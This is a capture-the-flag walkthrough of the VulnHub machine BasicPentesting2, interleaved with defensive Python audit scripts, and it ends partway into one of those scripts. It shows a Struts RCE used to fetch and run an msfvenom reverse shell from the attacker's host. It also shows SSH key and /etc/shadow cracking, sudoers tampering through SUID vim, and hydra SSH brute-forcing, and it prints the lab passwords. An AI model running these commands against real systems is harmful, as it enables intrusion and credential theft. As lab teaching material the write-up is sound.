VM : BasicPentesting2
Download Link : https://www.vulnhub.com/entry/basic-pentesting-2,241/
Start the VM and get IP of VM :
$ nmap -sP 192.168.56.0/24
Nmap scan report for 192.168.56.1
Host is up (0.000088s latency).
Nmap scan report for 192.168.56.100
Host is up (0.00017s latency).
Nmap scan report for 192.168.56.103
Host is up (0.00024s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 17.09 seconds
In the list above, 192.168.56.103 is our target VM.
Scanning the target :
$ nmap -sV 192.168.56.103 -oN nmap.scan
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-12 18:03 UTC
Nmap scan report for 192.168.56.103
Host is up (0.00020s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.52 seconds
Scan Results :
- OpenSSH 7.2p2
- Web Server on port 80
- Also a Tomcat server is running on port 8080
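The service table above is the kind of thing worth turning into structured data so it can be diffed against what the host is supposed to expose. The following is an added example, not code from the writeup: it parses the `nmap -sV` port lines as pasted above (constructed input) and reports open ports outside an assumed exposure baseline of SSH and the port-80 site, plus the version strings the services leaked.

```python
import re
from dataclasses import dataclass

# Constructed sample: the service table from the nmap -sV scan in this writeup,
# pasted as plain text (it is input here, not re-scanned).
NMAP_SAMPLE = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.7
"""

# One port line: "<port>/<proto> <state> <service> [<version text>]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


@dataclass(frozen=True)
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str


def parse_nmap_services(text):
    """Turn the text table of `nmap -sV` into Service records; the header and
    any non-port lines are skipped."""
    services = []
    for raw in text.splitlines():
        m = PORT_LINE.match(raw.strip())
        if m:
            port, proto, state, name, version = m.groups()
            services.append(Service(int(port), proto, state, name, version or ""))
    return services


def unexpected_exposure(services, allowed_ports):
    """Open ports that are not in the documented exposure baseline
    (assumed here: only SSH and the port-80 site should be reachable)."""
    return sorted(s.port for s in services
                  if s.state == "open" and s.port not in allowed_ports)


def version_fingerprints(services):
    """Map port -> version string for services that leaked one, so each can
    be checked against the distribution's advisories."""
    return {s.port: s.version for s in services if s.version}


if __name__ == "__main__":
    svcs = parse_nmap_services(NMAP_SAMPLE)
    print("unexpected open ports:", unexpected_exposure(svcs, {22, 80}))
    for port, ver in version_fingerprints(svcs).items():
        print(f"{port:>5}: {ver}")
```

On this host the baseline diff surfaces SMB on 139/445, the AJP connector on 8009 and Tomcat on 8080; AJP in particular is normally bound to loopback, so its appearance in an external scan is a configuration finding on its own.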
There is nothing special on the web page.
Now let's scan the web server for hidden URLs, directories or paths with dirb.
$ dirb http://192.168.56.103/ -o dirb.scan
-----------------
DIRB v2.22
By The Dark Raver
-----------------
OUTPUT_FILE: dirb.scan
START_TIME: Sun Jan 12 18:17:14 2020
URL_BASE: http://192.168.56.103/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.103/ ----
==> DIRECTORY: http://192.168.56.103/development/
+ http://192.168.56.103/index.html (CODE:200|SIZE:158)
+ http://192.168.56.103/server-status (CODE:403|SIZE:302)
---- Entering directory: http://192.168.56.103/development/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sun Jan 12 18:17:15 2020
DOWNLOADED: 4612 - FOUND: 2
As we can see there is a development directory; let's open it.
There are two text files :
dev.txt
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
j.txt
For J:
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-K
These look like chat files. In the first file there is a conversation about the installation of Apache Struts version 2.5.12, which means there is an Apache Struts app installed on the server; it runs as a Java servlet application, on port 8080. We know that Apache Struts version 2.5.12 is vulnerable to remote code execution; for more details about the vulnerability visit the link : [ApacheStruts Link]. Testing for the vulnerability is also explained in that post, so just follow the instructions.
Download exploit from here : https://www.exploit-db.com/exploits/42627
Start an HTTP server on port 1234; I am using the PHP interpreter's built-in web server :
php -S 192.168.56.1:1234
PHP 7.2.24-0ubuntu0.18.04.1 Development Server started at Fri Dec 27 18:31:57 2019
Listening on http://192.168.56.1:1234
Document root is /home/ajay
Press Ctrl-C to quit.
Now run the exploit :
$ python3 exploit.py http://192.168.56.103:8080/struts2-rest-showcase-2.5.12/orders/3 "wget http://192.168.56.1:1234/Vulnerable"
Our local web server is called by the Apache Struts server, which means we have remote code execution on the Struts server.
Getting Reverse Shell on target Server :
Generating reverse shell payload with msfvenom
$ msfvenom -p linux/x64/shell_reverse_tcp -f elf LHOST=192.168.56.1 LPORT=1234 -o rev_shell
Starting a netcat listener on port 1234 :
$ nc -lvvp 1234
Hosting our reverse shell backdoor on the local web server : http://192.168.56.1/rev_shell
Now the idea is to trigger the Apache Struts RCE vulnerability and force the target VM to download the backdoor and execute it, which connects back to our listener, giving us a reverse shell on the target server. The addresses are :
Target url :
http://192.168.56.103:8080/struts2-rest-showcase-2.5.12/orders/3
Backdoor file location : http://192.168.56.1/rev_shell
Command to execute on the target : cd /tmp/;wget http://192.168.56.1/rev_shell;chmod +x rev_shell;./rev_shell
Running the exploit : $ python3 exploit.py http://192.168.56.103:8080/struts2-rest-showcase-2.5.12/orders/3 "cd /tmp/;wget http://192.168.56.1:8080/rev_shell;chmod +x rev_shell;./rev_shell"
and we get a reverse shell on our nc listener prompt.
Starting a tty shell with python pty library :
python -c 'import pty;pty.spawn("/bin/bash")'
Privilege Escalation :
Let's go to the /home/ directory, so we can see how many users are on the system.
tomcat9@basic2:/home$ ls
jan kay
There are two users, "jan" and "kay". Let's check jan's folder first.
tomcat9@basic2:/home$ cd jan
tomcat9@basic2:/home/jan$ ls -al
total 16
drwxr-xr-x 2 root root 4096 Nov 29 16:55 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 root jan 47 Apr 23 2018 .lesshst
-rw------- 1 root jan 602 Nov 29 16:55 .viminfo
There's nothing interesting; now checking kay's directory :
$ ls -al
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 kay kay 937 Jan 13 23:52 .bash_history
-rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
drwx------ 2 kay kay 4096 Apr 17 2018 .cache
-rw------- 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
-rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Nov 29 17:05 .ssh
-rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 root kay 538 Apr 23 2018 .viminfo
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
There's a .ssh folder and inside it we find the private SSH RSA key "id_rsa" for user kay. With that we can log in as kay.
$ ls
authorized_keys id_rsa id_rsa.pub
But first we need to crack the passphrase for the user kay. For this we are going to use John the Ripper. Download the id_rsa file to the attacker machine and convert it into a format John can crack with ssh2john.py. You can download it from here : Download Link
$ python ssh2john.py id_rsa > rsa_key.dat
$ john rsa_key.dat
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 3 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 1 candidate buffered for the current salt, minimum 8 needed for performance.
Warning: Only 6 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Proceeding with incremental:ASCII
0g 0:00:00:44 3/3 0g/s 3137Kp/s 3137Kc/s 3137KC/s nl1nt..nl1sj
0g 0:00:00:46 3/3 0g/s 3178Kp/s 3178Kc/s 3178KC/s mdgblk..mdgbjn
0g 0:00:01:03 3/3 0g/s 3409Kp/s 3409Kc/s 3409KC/s rymagns..rymagls
0g 0:00:01:04 3/3 0g/s 3420Kp/s 3420Kc/s 3420KC/s 3gsimg..3gsigs
0g 0:00:01:08 3/3 0g/s 3461Kp/s 3461Kc/s 3461KC/s ff68br3..ff68bck
beeswax (id_rsa_key)
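The john banner above is informative on its own: "KDF/cipher 0=MD5/AES" and "iteration count 1" mean the key was stored in the legacy PEM format, where the passphrase is stretched by a single MD5 pass, which is why a short dictionary word fell in about a minute. The following is an added example, not code from the writeup: it reads only the header of a private key file and reports which KDF protects it, so a defender can sweep user home directories for keys that still use the legacy format or a low bcrypt round count. The sample keys are constructed headers with no real key material behind them.

```python
import base64
import struct

MAGIC = b"openssh-key-v1\x00"


def _ssh_string(data, offset):
    """Read one SSH wire-format string (uint32 big-endian length + bytes)."""
    (length,) = struct.unpack_from(">I", data, offset)
    start = offset + 4
    return data[start:start + length], start + length


def inspect_private_key(pem_text):
    """Report how the passphrase protects an SSH private key file.

    Returns a dict with format, encrypted, kdf, rounds and a weak flag.
    Only the header is parsed; nothing is decrypted.
    """
    lines = [ln.strip() for ln in pem_text.strip().splitlines() if ln.strip()]
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        body = "".join(ln for ln in lines[1:] if not ln.startswith("-----"))
        blob = base64.b64decode(body)
        if not blob.startswith(MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        off = len(MAGIC)
        cipher, off = _ssh_string(blob, off)
        kdf, off = _ssh_string(blob, off)
        kdf_opts, off = _ssh_string(blob, off)
        rounds = None
        if kdf == b"bcrypt":
            # kdfoptions = string salt || uint32 rounds
            _salt, o = _ssh_string(kdf_opts, 0)
            (rounds,) = struct.unpack_from(">I", kdf_opts, o)
        encrypted = cipher != b"none"
        # Assumed policy: anything below ssh-keygen's default of 16 bcrypt rounds is weak
        weak = (not encrypted) or kdf != b"bcrypt" or rounds < 16
        return {"format": "openssh-key-v1", "encrypted": encrypted,
                "kdf": kdf.decode(), "rounds": rounds, "weak": weak}
    # Legacy PEM ("BEGIN RSA PRIVATE KEY"): the passphrase goes through one MD5
    # pass (OpenSSL EVP_BytesToKey), matching john's "MD5/AES, iteration count 1".
    encrypted = any(ln.startswith("Proc-Type:") and "ENCRYPTED" in ln for ln in lines)
    return {"format": "pem", "encrypted": encrypted,
            "kdf": "md5" if encrypted else "none",
            "rounds": 1 if encrypted else None, "weak": True}


def _build_openssh_header(cipher, kdf, rounds):
    """Construct just the header of an openssh-key-v1 file for the example;
    the key sections that normally follow are omitted."""
    def s(b):
        return struct.pack(">I", len(b)) + b
    kdf_opts = s(b"\x00" * 16) + struct.pack(">I", rounds) if kdf == b"bcrypt" else b""
    blob = MAGIC + s(cipher) + s(kdf) + s(kdf_opts)
    b64 = base64.b64encode(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"


# Constructed samples (headers only, no usable key inside)
LEGACY_ENCRYPTED = """\
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF

AAAA
-----END RSA PRIVATE KEY-----
"""
MODERN_BCRYPT = _build_openssh_header(b"aes256-ctr", b"bcrypt", 16)
UNENCRYPTED = _build_openssh_header(b"none", b"none", 0)

if __name__ == "__main__":
    for label, key in (("legacy", LEGACY_ENCRYPTED), ("bcrypt", MODERN_BCRYPT),
                       ("plain", UNENCRYPTED)):
        print(label, inspect_private_key(key))
```

Keys in the legacy format can be re-encrypted in place with `ssh-keygen -p -o -a <rounds>`, which rewrites them as openssh-key-v1 with bcrypt; the check above is what you would run before and after such a migration.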
The passphrase is beeswax; now log in as kay with the id_rsa key and passphrase "beeswax" :
$ ssh -i id_rsa kay@localhost
Could not create directory '/home/tomcat9/.ssh'.
The authenticity of host 'localhost (::1)' can't be established.
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no)? yes
yes
Failed to add the host to the list of known hosts (/home/tomcat9/.ssh/known_hosts).
Enter passphrase for key 'id_rsa': beeswax
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Jan 13 23:44:21 2020 from ::1
kay@basic2:~$
There is a file pass.bak :
$ ls
pass.bak
$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
This is possibly the password for the root user; now let's try it.
$ sudo -i
[sudo] password for kay: heresareallystrongpasswordthatfollowsthepasswordpolicy$$
root@basic2:~#
Yep!!, we got the root shell.
$ ls
flag.txt
root@basic2:~# cat flag.txt
Congratulations! You've completed this challenge. There are two ways (that I'm aware of) to gain
a shell, and two ways to privesc. I encourage you to find them all!
If you're in the target audience (newcomers to pentesting), I hope you learned something. A few
takeaways from this challenge should be that every little bit of information you can find can be
valuable, but sometimes you'll need to find several different pieces of information and combine
them to make them useful. Enumeration is key! Also, sometimes it's not as easy as just finding
an obviously outdated, vulnerable service right away with a port scan (unlike the first entry
in this series). Usually you'll have to dig deeper to find things that aren't as obvious, and
therefore might've been overlooked by administrators.
Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you'll send
me a link! I can be reached at josiah@vt.edu. If you've got questions or feedback, please reach
out to me.
Happy hacking!
root@basic2:~#
And that's it!!! There is a flag.txt file, we won !!
Some other Methods to crack the user accounts :
However, there are also some other methods to get a root shell on the machine.
Finding SUID root Binaries :
Let's try to find the executable binaries that are SUID root.
$ find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null
-rwsr-xr-x 1 root root 38984 Jun 14 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 14864 Jan 17 2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 85832 Nov 30 2017 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 428240 Jan 18 2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 2437320 Nov 24 2016 /usr/bin/vim.basic
-rwsr-xr-x 1 root root 23376 Jan 17 2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 39904 May 16 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 49584 May 16 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 136808 Jul 4 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 40432 May 16 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 75304 May 16 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 54256 May 16 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su
-rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 27608 Nov 30 2017 /bin/umount
-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
-rwsr-xr-x 1 root root 40152 Nov 30 2017 /bin/mount
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
As we can see, vim also has SUID root, which means we can open/edit root-privileged files with vim. So we are now going to crack user passwords from the /etc/shadow file.
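From the defending side, the listing above is exactly the artifact a periodic SUID audit should consume: everything in it except vim.basic is a stock setuid binary, and an editor with setuid is a full root file read/write primitive. The following is an added example, not code from the writeup: it parses the `ls -ld` lines produced by the find command (constructed input, copied from the listing above), compares them with an assumed baseline of setuid-root paths recorded from a clean reference install, and separately flags editors and pagers regardless of baseline.

```python
import os

# Constructed input: the setuid-root listing produced by the find command in
# this writeup (`find / -perm -4000 -user root -exec ls -ld {} \;`).
SUID_LISTING = """\
-rwsr-xr-x 1 root root 38984 Jun 14 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 14864 Jan 17 2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 85832 Nov 30 2017 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 428240 Jan 18 2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 2437320 Nov 24 2016 /usr/bin/vim.basic
-rwsr-xr-x 1 root root 23376 Jan 17 2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 39904 May 16 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 49584 May 16 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 136808 Jul 4 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 40432 May 16 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 75304 May 16 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 54256 May 16 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su
-rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 27608 Nov 30 2017 /bin/umount
-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
-rwsr-xr-x 1 root root 40152 Nov 30 2017 /bin/mount
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
"""

# Assumed baseline: setuid-root paths recorded from a clean reference install of
# the same distribution with the same find command. Constructed for the example;
# vim.basic is absent because a stock install does not ship it setuid.
BASELINE = {
    "/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic", "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/snapd/snap-confine",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/bin/pkexec", "/usr/bin/newgrp", "/usr/bin/chfn", "/usr/bin/sudo", "/usr/bin/chsh",
    "/usr/bin/newgidmap", "/usr/bin/gpasswd", "/usr/bin/newuidmap", "/usr/bin/passwd",
    "/bin/su", "/bin/ntfs-3g", "/bin/ping6", "/bin/umount", "/bin/fusermount", "/bin/mount",
    "/bin/ping",
}

# Assumed: programs that read and write arbitrary files, which must never carry
# setuid whatever the baseline says. Extend for your environment.
FILE_EDITORS = {"vim", "vim.basic", "vim.tiny", "vi", "nano", "ed", "less", "more"}


def parse_ls_listing(text):
    """Parse `ls -ld` lines into dicts; the path is everything after the 8th field."""
    entries = []
    for line in text.splitlines():
        parts = line.split(None, 8)  # mode links owner group size mon day year|time path
        if len(parts) < 9 or not parts[0].startswith("-"):
            continue  # skip blank lines and non-regular files
        mode = parts[0]
        entries.append({
            "path": parts[8], "owner": parts[2], "group": parts[3], "mode": mode,
            "setuid": mode[3] in "sS",  # owner-execute slot carries the setuid flag
            "setgid": mode[6] in "sS",  # group-execute slot carries the setgid flag
        })
    return entries


def audit_suid(entries, baseline=BASELINE, editors=FILE_EDITORS):
    """Return {path: [reasons]} for setuid-root files that deserve a look."""
    findings = {}
    for e in entries:
        if not (e["setuid"] and e["owner"] == "root"):
            continue
        reasons = []
        if e["path"] not in baseline:
            reasons.append("setuid-root file not present in baseline")
        if os.path.basename(e["path"]) in editors:
            reasons.append("editor/pager with setuid: can read or write any file as root")
        if reasons:
            findings[e["path"]] = reasons
    return findings


if __name__ == "__main__":
    for path, reasons in audit_suid(parse_ls_listing(SUID_LISTING)).items():
        print(path)
        for r in reasons:
            print("   -", r)
```

Run against this listing it reports only /usr/bin/vim.basic, with both reasons; on a real fleet the baseline would come from package metadata or a golden image rather than a literal set.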
With vim we can open /etc/shadow file can then try to crack the password for users with john.
$ vim /etc/shadow
Editing with vim on a reverse shell is cumbersome, so press Return until you get to the usernames, and it will look like this. There are some parts of it missing, so we write the buffer to a new file at /home/code.hash using vim's command mode with the command :w /home/code.hash. Now we are interested in cracking only two accounts :
kay:$6$ON8Wi9Ow$Puwzhgbc2chaNEqWFO/UVH2yJ5zVb3WirwtCxQ5ssr2OEMAuYCrHscUNe.KPUhH6ND4CYx9WWu449W3mrzVtk/:17644:0:99999:7:::
jan:$6$Bbz6m7oU$WjYF4ZiF/QuPuiNAzl7bthT8LvIWikymEtX6tZ0WplHQUmMezufOCrKQRdxqbP8j03.x.pXv04xDgexxwbIIG0:17640:0:99999:7:::
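The two entries above carry more than the hashes: the `$6$` prefix with no `rounds=` parameter means sha512crypt at its 5000-iteration default, and the third field dates the last password change (17644 days after the epoch is 2018-04-23, the day of the dev.txt note). The following is an added example, not code from the writeup: a shadow-file parser that classifies each account's hash and flags the ones that are cheap to attack offline, using the two lines above as constructed input; the 100000-round threshold is an assumed local policy, not a value from the page.

```python
from datetime import date, timedelta

# Constructed input: the two /etc/shadow entries recovered in this writeup.
SHADOW_SAMPLE = """\
kay:$6$ON8Wi9Ow$Puwzhgbc2chaNEqWFO/UVH2yJ5zVb3WirwtCxQ5ssr2OEMAuYCrHscUNe.KPUhH6ND4CYx9WWu449W3mrzVtk/:17644:0:99999:7:::
jan:$6$Bbz6m7oU$WjYF4ZiF/QuPuiNAzl7bthT8LvIWikymEtX6tZ0WplHQUmMezufOCrKQRdxqbP8j03.x.pXv04xDgexxwbIIG0:17640:0:99999:7:::
"""

# crypt(3) prefix -> (algorithm name, iteration count used when no rounds= is given)
HASH_IDS = {
    "1": ("md5crypt", 1000), "5": ("sha256crypt", 5000), "6": ("sha512crypt", 5000),
    "2a": ("bcrypt", None), "2b": ("bcrypt", None), "y": ("yescrypt", None), "7": ("yescrypt", None),
}
WEAK_ALGORITHMS = {"descrypt", "md5crypt", "unknown"}


def parse_hash_field(field):
    """Classify the password field of one shadow entry."""
    if field == "":
        return {"algorithm": "empty", "rounds": None, "locked": False}
    if field.startswith(("!", "*")):
        return {"algorithm": "locked", "rounds": None, "locked": True}
    parts = field.split("$")  # '', id, [rounds=N | bcrypt cost | params], salt, digest
    if len(parts) < 4:
        return {"algorithm": "descrypt", "rounds": None, "locked": False}
    name, rounds = HASH_IDS.get(parts[1], ("unknown", None))
    if parts[2].startswith("rounds="):
        rounds = int(parts[2].split("=", 1)[1])
    elif name == "bcrypt":
        rounds = int(parts[2])  # bcrypt stores its cost as log2 of the work factor
    return {"algorithm": name, "rounds": rounds, "locked": False}


def parse_shadow(text):
    """Parse shadow lines into dicts: user, hash details, last change date, max age."""
    accounts = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        info = parse_hash_field(f[1])
        info["user"] = f[0]
        # field 3 is days since 1970-01-01; 17644 -> 2018-04-23
        info["last_changed"] = (date(1970, 1, 1) + timedelta(days=int(f[2]))).isoformat() if f[2] else None
        info["max_days"] = int(f[4]) if f[4] else None
        accounts.append(info)
    return accounts


def policy_findings(accounts, min_rounds=100_000):
    """Report accounts whose stored hash is cheap to attack offline.
    min_rounds is an assumed local policy, not a value from the page."""
    findings = {}
    for a in accounts:
        issues = []
        if a["algorithm"] == "empty":
            issues.append("empty password")
        elif a["algorithm"] in WEAK_ALGORITHMS:
            issues.append(f"weak hash: {a['algorithm']}")
        elif a["algorithm"] in ("sha256crypt", "sha512crypt") and a["rounds"] < min_rounds:
            issues.append(f"low cost: {a['rounds']} rounds")
        if issues:
            findings[a["user"]] = issues
    return findings


if __name__ == "__main__":
    accounts = parse_shadow(SHADOW_SAMPLE)
    for a in accounts:
        print(f"{a['user']}: {a['algorithm']} rounds={a['rounds']} changed={a['last_changed']}")
    print(policy_findings(accounts))
```

Raising the cost (`rounds=` in the PAM unix configuration, or a migration to yescrypt where the distribution supports it) does not save a password as weak as jan's, but it turns the seconds john needed here into a much longer run for the rest of the file.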
Cracking with john :
$ john shadow.dat
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 3 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 1 candidate buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
armando (jan)
We get jan's password, which is armando. Now let's try it.
$ su - jan
Password: armando
jan@basic2:~$
Editing /etc/sudoers file :
By editing the /etc/sudoers file we can give the user jan root permission. We just need to add the line jan ALL=(ALL:ALL) ALL to the file. Now open the file with vim and add the above line; this lets jan run commands as root :
$ vim /etc/sudoers
Now, to move the cursor down press Return, to edit press i, then after editing press 'Esc + :' (for command mode), type :wq! and hit Return. After the edit, the file will look like this :
As we can see jan is now listed in the sudoers list :
$ sudo -l
[sudo] password for jan: armando
Matching Defaults entries for jan on basic2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jan may run the following commands on basic2:
(ALL : ALL) ALL
Now getting a root shell :
$ sudo su -
root@basic2:~# ls
ls
flag.txt
root@basic2:~#
Enumeration with enum4linux :
Enum4linux is a tool for enumerating information from Windows and Samba systems. It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpcclient, net and nmblookup.
$ enum4linux 192.168.56.103
It generated a very long result; some of the important details are :
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
Bruteforcing ssh
We have the usernames; now we can brute-force the SSH passwords for those usernames with hydra.
$ hydra -l jan -P rockyou.txt 192.168.56.103 -t 10 ssh -o success
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-01-14 07:21:29
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 14344399 login tries (l:1/p:14344399), ~1434440 tries per task
[DATA] attacking ssh://192.168.56.103:22/
[STATUS] 110.00 tries/min, 110 tries in 00:01h, 14344289 to do in 2173:23h, 10 active
[STATUS] 86.67 tries/min, 260 tries in 00:03h, 14344139 to do in 2758:30h, 10 active
[STATUS] 72.86 tries/min, 510 tries in 00:07h, 14343889 to do in 3281:17h, 10 active
[22][ssh] host: 192.168.56.103 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-01-14 07:32:10
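Hydra's status lines put this at roughly 100 attempts a minute from one source, and sshd logs every one of them as a "Failed password" line in auth.log, followed by an "Accepted password" once the guess lands. The following is an added example, not code from the writeup: a detector that parses sshd auth.log lines, flags a source once it exceeds a failure threshold inside a sliding window, and records whether a later successful login came from that same source. The log lines are constructed to resemble what the run above would leave on the target, and the threshold, window and year are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

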